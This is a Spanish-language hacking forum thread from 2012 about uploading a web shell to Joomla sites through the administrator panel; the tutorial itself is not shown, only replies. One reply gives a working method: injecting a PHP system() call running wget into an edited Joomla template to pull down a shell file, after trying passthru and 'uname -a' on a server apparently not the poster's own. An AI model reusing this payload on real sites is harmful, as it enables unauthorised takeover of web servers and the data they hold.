Upload shell en Joomla

  • 10 Respuestas
  • 6111 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado duff10

  • *
  • Underc0der
  • Mensajes: 12
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Upload shell en Joomla

  • en: Mayo 19, 2012, 04:33:45 pm
Buenas chicos soy: Duff eh estado en otros foros de informatica como en Diosdelared... les quiero compartir un tutorial que hice, espero les guste.. comenten



« Última modificación: Julio 27, 2015, 04:52:03 am por blackdrake »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5703
  • Actividad:
    33.33%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email

Re:Upload shell en Joomla

  • en: Mayo 19, 2012, 04:47:51 pm
Que buen aporte Duff!!
Segui asi man!


Desconectado Abnormality

  • *
  • Underc0der
  • Mensajes: 392
  • Actividad:
    0%
  • Reputación 0
  • %SystemRoot%
    • Ver Perfil
    • Email

Re:Upload shell en Joomla

  • en: Mayo 19, 2012, 07:21:18 pm
Buen aporte, me gusto mucho. Saludos!

Desconectado M1ndCr4ck

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
  • Lo único que no podrán quitarnos es la mente
    • Ver Perfil
    • ~M1ndCr4ck~

Re:Upload shell en Joomla

  • en: Junio 01, 2012, 12:37:36 am
que gran aporte de mucha ayuda.
salu2 duff  ;D

Desconectado عя ҜΔŁĬ

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Upload shell en Joomla

  • en: Junio 27, 2012, 12:03:21 pm
Gracais por el tutorial, ya probe de dos formas, editando las plantilas y poniendo un uploader, y tambien con este método, pero al momento de subir el archivo me tira este error:

Citar
Not Acceptable

An appropriate representation of the requested resource /administrator/index.php could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Qué podría hacer para solucionarlo? Saludos

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5703
  • Actividad:
    33.33%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email

Re:Upload shell en Joomla

  • en: Junio 27, 2012, 12:05:41 pm
Quizas la version que tenes instalada ya esta parcheada


Desconectado Cronos

  • *
  • Ex-Staff
  • *****
  • Mensajes: 1000
  • Actividad:
    0%
  • Country: 00
  • Reputación 1
  • sudo su
    • Ver Perfil
    • Email

Re:Upload shell en Joomla

  • en: Junio 27, 2012, 12:09:48 pm
Si, yo instale Joomla y quise tratar de subir una shell por el Panel de Administracion como si fuera una imagen. Igual como dice el tutorial este, pero al tratar de modificar la seccion para agregar extenciones. Esta por lo que vi ya ha sido parcheada. Porlomenos en la version que probe que era la 2.5
Saludos,, Cronos.-

Desconectado عя ҜΔŁĬ

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Upload shell en Joomla

  • en: Junio 27, 2012, 12:26:30 pm
Gracias por las respuestas, la versión que usa es la 1.5.22. Acabo de intentar meterle passthru en las plantillas, pero al poner index.php=cmd=uname -a no me tira nada, seguire probando haciendo inlude o algun consejo que me digáis...
Saludos

EDIT: ya subí la shell, para los que quieran saber cómo, van a editar plantillas, y meten el comando system: <?php system("wget http:\\shell.txt") ?>
El comando  passthru y exec estaba dessactivado en ese servidor, por eso tuve que usar system()
Saludos ;)
« Última modificación: Junio 28, 2012, 07:28:24 am por عя ҜΔŁĬ »

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de

Re:Upload shell en Joomla

  • en: Junio 27, 2012, 03:23:03 pm
Si, yo instale Joomla y quise tratar de subir una shell por el Panel de Administracion como si fuera una imagen. Igual como dice el tutorial este, pero al tratar de modificar la seccion para agregar extenciones. Esta por lo que vi ya ha sido parcheada. Porlomenos en la version que probe que era la 2.5
Saludos,, Cronos.-
La 2.5 tiene vulnerabilidad en el registro : http://underc0de.org/foro/bugs-y-exploits/escalada-de-privilegios-en-joomla-a-traves-de-un-registro-sanko/
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado Dedalo

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • KUSH
  • Twitter: https://twitter.com/SeguridadBlanca
    • Ver Perfil
    • Twitter Personal

Re:Upload shell en Joomla

  • en: Junio 27, 2012, 08:18:46 pm

Desconectado hdbreaker

  • *
  • Ex-Staff
  • *****
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
  • Skype: hdbreaker96
  • Twitter: @SecSignal
    • Ver Perfil
    • Security Signal
    • Email

Re:Upload shell en Joomla

  • en: Junio 28, 2012, 12:07:19 am
Buen Aporte, Nunca lo habia probado!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

Subir Shell a través de Inyección SSI (Server-side include)

Iniciado por CalebBucker

Respuestas: 7
Vistas: 6026
Último mensaje Junio 23, 2012, 08:44:07 am
por s3cur1tyr00t
Shell-Save_1.0 [Administra de manera mas eficiente tus webshells online]

Iniciado por q3rv0

Respuestas: 9
Vistas: 6917
Último mensaje Abril 14, 2013, 05:34:46 am
por s3cur1tyr00t
Explotar LFI, Subir Shell Explotando /proc/self/environ y Backdoorizar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 4006
Último mensaje Julio 17, 2012, 12:35:31 am
por hdbreaker
HTTP METHODS: Subiendo Shell mediante PUT

Iniciado por dracko.rx

Respuestas: 0
Vistas: 3933
Último mensaje Febrero 24, 2010, 03:07:58 pm
por dracko.rx
[Video-Tutorial] SQL Injection + Subir shell

Iniciado por Xt3mP

Respuestas: 0
Vistas: 2815
Último mensaje Julio 21, 2010, 07:48:08 pm
por Xt3mP